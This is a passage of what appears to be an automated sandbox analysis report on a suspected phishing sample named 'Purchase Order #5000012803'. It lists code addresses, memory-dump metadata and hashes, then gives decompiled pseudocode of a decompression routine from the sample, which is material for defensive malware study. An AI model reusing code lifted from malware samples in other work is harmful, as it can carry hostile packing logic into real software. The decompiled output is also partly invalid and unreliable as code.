                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00000000
                      0x00406828
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x00000000
                      0x0040667d
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf

                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                      • Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
                      • Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                      • Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00405E9D, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                      Download Yara Rule
                      C-Code - Quality: 98%
                      			E00405E9D(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
